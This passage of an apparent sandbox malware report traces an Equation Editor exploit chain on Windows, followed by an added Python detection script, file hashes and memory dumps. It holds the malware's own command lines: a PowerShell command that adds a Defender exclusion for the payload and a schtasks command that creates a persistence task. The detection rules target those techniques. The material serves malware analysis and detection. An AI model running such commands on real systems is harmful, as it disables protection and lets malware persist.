      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\thHVOlYHyYRLoS.exe"
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\schtasks.exe (PID 1880)
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\thHVOlYHyYRLoS" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1C29.tmp"
      - Creates scheduled task(s)
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 1144)
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      - Accesses Microsoft Outlook profiles
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
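The process tree above, read together with the Equation Editor and SetThreadContext signatures, is the kind of chain that is simplest to catch on parent/child relationships and command lines rather than on file hashes. The following is an added example, not part of the report or of any vendor's rule set, that encodes five such checks and runs them over process-creation events constructed to mirror this run. PIDs, image paths and command lines are taken from the report; the event field names, the empty parent recorded for the two roots, and the rule thresholds are assumptions of this example.

```python
import ntpath

# Constructed process-creation events that mirror the tree above. PIDs, images
# and command lines come from the report; field names and the empty parent for
# the two roots are assumptions of this example.
EVENTS = [
    {"pid": 1668, "ppid": None,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": '"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE" /n '
                '"C:\\Users\\Admin\\AppData\\Local\\Temp\\Order 84889-CVE2-52022.docx"'},
    {"pid": 468, "ppid": 1668, "image": r"C:\Windows\splwow64.exe",
     "cmdline": "C:\\Windows\\splwow64.exe 12288"},
    {"pid": 1332, "ppid": None,
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": '"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" -Embedding'},
    {"pid": 896, "ppid": 1332, "image": r"C:\Users\Public\vbc.exe",
     "cmdline": '"C:\\Users\\Public\\vbc.exe"'},
    {"pid": 680, "ppid": 896,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference '
                '-ExclusionPath "C:\\Users\\Admin\\AppData\\Roaming\\thHVOlYHyYRLoS.exe"'},
    {"pid": 1880, "ppid": 896, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": '"C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\thHVOlYHyYRLoS" '
                '/XML "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp1C29.tmp"'},
    {"pid": 1144, "ppid": 896,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": '"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"'},
]

# .NET utilities commonly started empty and then hollowed (list is an assumption).
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}


def _name(image: str) -> str:
    return ntpath.basename(image).lower()


def _args(cmdline: str) -> str:
    """Argument tail of a Windows command line, for a quoted or bare image path."""
    c = cmdline.strip()
    if c.startswith('"'):
        end = c.find('"', 1)
        return c[end + 1:].strip() if end != -1 else ""
    return c.partition(" ")[2].strip()


def _user_writable(path: str) -> bool:
    p = path.lower()
    return (p.startswith("c:\\users\\public") or "\\appdata\\" in p
            or "\\temp\\" in p or p.startswith("c:\\programdata"))


def detect(events: list) -> list:
    """Run the rules over process-creation events; return one alert per (rule, pid)."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        name, cmd = _name(e["image"]), e["cmdline"].lower()
        pname = _name(parent["image"]) if parent else ""
        pimage = parent["image"] if parent else ""

        def alert(rule, why):
            alerts.append({"rule": rule, "pid": e["pid"], "image": e["image"], "why": why})

        # Equation Editor renders OLE objects; it has no reason to spawn children.
        if pname == "eqnedt32.exe":
            alert("equation_editor_child", "child of EQNEDT32.EXE (CVE-2017-11882-style chain)")
        # The real VB.NET compiler lives under Microsoft.NET; elsewhere the name is a disguise.
        if name == "vbc.exe" and "\\microsoft.net\\" not in e["image"].lower():
            alert("masquerading_vbc", "vbc.exe outside the .NET Framework directory")
        if name == "powershell.exe" and "add-mppreference" in cmd and "-exclusionpath" in cmd:
            alert("defender_exclusion", "Defender path exclusion added from the command line")
        if name == "schtasks.exe" and "/create" in cmd and _user_writable(pimage):
            alert("schtasks_from_user_writable", "task created by a binary in a user-writable path")
        if name in HOLLOW_HOSTS and _args(e["cmdline"]) == "" and _user_writable(pimage):
            alert("hollowing_host", ".NET utility started with no arguments by a user-writable parent")
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f'{a["rule"]:28} pid={a["pid"]:<5} {a["image"]}  ({a["why"]})')
```

Run against the constructed events, the rules fire on exactly the four malicious processes (vbc.exe twice, then powershell.exe, schtasks.exe and RegSvcs.exe) and stay quiet on WINWORD.EXE, splwow64.exe and EQNEDT32.EXE itself, which is the behaviour you want from a parent/child rule: the exploit host is normal, its child is not.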
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{85F3081F-3681-4532-BB08-F6A6723F069E}.FSD
  Filesize: 128KB
  MD5: dd07c5881fc344707cb514d1a61c986a
  SHA1: f00bcabf5b3248f94d0456e84e2f516b7e313022
  SHA256: 845a891e23e4ad58c96a83865f4adf4e2f20428fac96e7a033e3cc03547368c7
  SHA512: ef2f5fa2e23271230db9ccedc011d9035653b6ddff0b5fda22f33b10390abf1b5ab08fc2e675ac39fae07fcaaf04d50210c7ae11cb171252ae9f0c41d68b61d2
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FS‌D-CNRY.FSD
  Filesize: 128KB
  MD5: b494e82d27f6da9a68660a30f641feb3
  SHA1: 9bab14f4baccd32700d3b0b75c1ce0a13967d2f6
  SHA256: 3741894c26d545806635edc187328e51948b28d4c552ae3d3e59fbd93f6e2aeb
  SHA512: 1fd65dfacd79bea86089ff7fd81431581d945c2bfb3489d7e37e04a075f64566ce1dde92296ff77b021459a9f0277a52edf811d811bf01de59dce08b90cd2842
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{90D7D9CC-40B9-4DDA-A062-A5A7021FE5F8}.FSD
  Filesize: 128KB
  MD5: dd48ae589f11d97e129cd2d0487010ac
  SHA1: 47b6678fc99816cdad417c48c7bcaad14a31de11
  SHA256: 3975cd6b6a1c69d33f78f0ae5231efab51f99bd0ea09779950043afe8551813d
  SHA512: f38a061b50ee33f50d0cd7b92ae84779028bd4cb44e8c3af0b045a2d24d509f4ba78016a855ee15015edd18aa292a32b6bc3a10b1859f71808e33e09789428d5
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S7FIT0B8\e2[1].doc
  Filesize: 14KB
  MD5: b13a74dca15cc4c5b3e73d60c4f100e3
  SHA1: a67404eb18267d09a5d54f2e7ea9e85097bdd3f5
  SHA256: 5e41401cc62f4ff58c658edce9d1823e2f6f84a646c9aa1c7fbac7f091ebc614
  SHA512: ae9ee73aca3b515f7cfa4a7672809cf3da69bcc91d2676bf4a5666986ad1e4603148edbb588b10bb0c03b55fe0d31b1e348bb7006482bd252a58dfb12facb1e1
- C:\Users\Admin\AppData\Local\Temp\tmp1C29.tmp
  Filesize: 1KB
  MD5: 0bc3962d41075c400360f07c6a52e3aa
  SHA1: 15759f03f512172d9bb8b39ebc03eac0bac03826
  SHA256: 7db9f4840b7dcf2b79b916c42efe2a0ff12a0b52347ec993d595ec2e0339b31f
  SHA512: 0a0b241e098599578137d8157ac8d7217cfdd25d1645accf3a815c2d283efa9b9beeb507fa381ee4ebf1175bfd2ea23795d4dd44b02bc1c76de680bc9b11ea8d
- C:\Users\Admin\AppData\Local\Temp\{D4C61040-7E1C-4331-A302-DD6190966C93}
  Filesize: 128KB
  MD5: e8c2d73265fcd3d2245c8fcf7e4e4b22
  SHA1: a88750072b15d305a27143068240b3c7d2f20131
  SHA256: 5424b925e7d89022bda4e4cfe82e99d8850fc7082d022c4810b0a2c59945d53e
  SHA512: ab84ae6b0c48ce6fe9d3e5af8e5c79131d7fed1f28900691b4b14fb6c083828abd16f93af0bcc08da3f42d71d16702ea75e40cd08abecc8ced74d64c14d04e50
- C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
  Filesize: 20KB
  MD5: a2c431577be7e81f854aa11ae86b6d70
  SHA1: 90a776cd07cae92a138d2a24da43aea1ba98e61d
  SHA256: a6ef2c8847b1e48287ff84cb7cdb5158297dd147a3dedc1cdfc9660ce6c29107
  SHA512: f3b7ef9a9edfdf9ad2f04f947ce0dd701c2b6bb5d3e552370053e2159077ed66828b9e70d6a63ccbedec46fd58d734b2fda94073aa8c222edce586f8d2f2759c
- C:\Users\Public\vbc.exe (also recorded as \Users\Public\vbc.exe)
  Filesize: 976KB
  MD5: 6d481784ddebd32b6a604a897874f25c
  SHA1: 928bba0214e7e44f12da24c6ae48d038b877abff
  SHA256: 7cb205c2b341f4f78195275cc37cb07cf7b24a0f31f09639896bb97a4130e430
  SHA512: 3f42c61ebc447a6c6decac361d4aa609d287607780f83eef56a277eeb34847f2c6dce58ee77d833cbea6388846ff52a01237ecd88da230dd1d7d947c666dc04c
-
Memory dumps:
- memory/680-172-0x00000000025C0000-0x0000000002600000-memory.dmp (256KB)
- memory/680-173-0x00000000025C0000-0x0000000002600000-memory.dmp (256KB)
- memory/896-143-0x00000000004C0000-0x00000000004DA000-memory.dmp (104KB)
- memory/896-145-0x0000000004C80000-0x0000000004CC0000-memory.dmp (256KB)
- memory/896-150-0x0000000004C80000-0x0000000004CC0000-memory.dmp (256KB)
- memory/896-151-0x0000000000440000-0x000000000044C000-memory.dmp (48KB)
- memory/896-152-0x0000000005480000-0x000000000552A000-memory.dmp (680KB)
- memory/896-142-0x00000000012E0000-0x00000000013DA000-memory.dmp (1000KB)
- memory/896-158-0x0000000004AE0000-0x0000000004AE6000-memory.dmp (24KB)
- memory/896-159-0x0000000004CC0000-0x0000000004CF2000-memory.dmp (200KB)
- memory/1144-166-0x000000007EFDE000-0x000000007EFDF000-memory.dmp (4KB)
- memory/1144-164-0x0000000000400000-0x0000000000430000-memory.dmp (192KB)
- memory/1144-167-0x0000000000400000-0x0000000000430000-memory.dmp (192KB)
- memory/1144-162-0x0000000000400000-0x0000000000430000-memory.dmp (192KB)
- memory/1144-169-0x0000000000400000-0x0000000000430000-memory.dmp (192KB)
- memory/1144-171-0x0000000000400000-0x0000000000430000-memory.dmp (192KB)
- memory/1144-165-0x0000000000400000-0x0000000000430000-memory.dmp (192KB)
- memory/1144-163-0x0000000000400000-0x0000000000430000-memory.dmp (192KB)
- memory/1144-174-0x0000000004D20000-0x0000000004D60000-memory.dmp (256KB)
- memory/1668-54-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
- memory/1668-218-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)